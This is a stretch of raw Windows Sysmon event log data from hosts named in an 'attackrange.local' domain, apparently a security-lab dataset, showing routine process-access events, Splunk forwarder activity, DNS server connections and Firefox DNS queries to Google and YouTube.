10341000x8000000000000000151398Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151397Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000151396Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 10341000x8000000000000000151395Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.213{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151394Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.213{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151393Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.213{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151392Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.213{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151391Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.198{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151390Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.198{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151389Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.147{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7121-60CA-200D-00000000D101}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151388Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.131{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-7121-60CA-200D-00000000D101}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151387Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.131{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151386Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.131{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151385Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.131{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151384Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.131{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151383Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.131{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7121-60CA-200D-00000000D101}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151382Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.134{39BD8DE3-7121-60CA-200D-00000000D101}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104924Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:10.943{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16AE1A7F7EFE7E6C08095D150EA140DA,SHA256=EC417510C1303D84BC517BB6824EAEAD635AF020141395D2F7E2BD2C1DC6B542,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104923Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.585{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal49701- 354300x8000000000000000104922Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.539{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal61523- 354300x8000000000000000104921Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.537{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal60217- 354300x8000000000000000104920Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.536{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal49873- 354300x8000000000000000104919Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.534{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal63797- 354300x8000000000000000104918Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.534{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal65451- 354300x8000000000000000104917Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.534{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal64170- 354300x8000000000000000104916Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.534{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal63331- 354300x8000000000000000104915Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.533{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal58580- 354300x8000000000000000104914Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.533{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal64199- 354300x8000000000000000104913Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.532{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal58653- 354300x8000000000000000104912Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.532{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal52454- 354300x8000000000000000104911Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.532{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal61620- 354300x8000000000000000104910Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.532{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal57415- 354300x8000000000000000104909Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.532{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal55450- 354300x8000000000000000104908Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.532{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal61506- 354300x8000000000000000104907Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.517{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal52853- 354300x8000000000000000104906Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.516{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal63549- 354300x8000000000000000104905Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.513{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal53390- 22542200x8000000000000000151437Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.675{39BD8DE3-131D-60CA-0B01-00000000D101}1192youtubei.googleapis.com0142.251.33.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151436Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.675{39BD8DE3-131D-60CA-0B01-00000000D101}1192youtube-ui.l.google.com0142.251.33.78;142.250.217.78;142.250.217.110;172.217.14.206;172.217.14.238;142.250.69.206;142.251.33.110;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151435Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.675{39BD8DE3-131D-60CA-0B01-00000000D101}1192use-application-dns.net044.236.48.31;44.235.246.155;44.236.72.93;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151434Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.674{39BD8DE3-131D-60CA-0B01-00000000D101}1192youtube.googleapis.com0172.217.14.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151433Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.674{39BD8DE3-131D-60CA-0B01-00000000D101}1192www.google.com0142.250.69.196;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151432Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.674{39BD8DE3-131D-60CA-0B01-00000000D101}1192google.com0172.217.14.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151431Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.672{39BD8DE3-131D-60CA-0B01-00000000D101}1192youtubei.googleapis.com.0142.251.33.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151430Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.672{39BD8DE3-131D-60CA-0B01-00000000D101}1192www.youtube-nocookie.com.0type: 5 youtube-ui.l.google.com;142.251.33.110;142.251.33.78;142.250.217.78;142.250.217.110;172.217.14.206;172.217.14.238;142.250.69.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151429Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.672{39BD8DE3-131D-60CA-0B01-00000000D101}1192use-application-dns.net.044.236.48.31;44.235.246.155;44.236.72.93;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000151428Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:10.419{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla 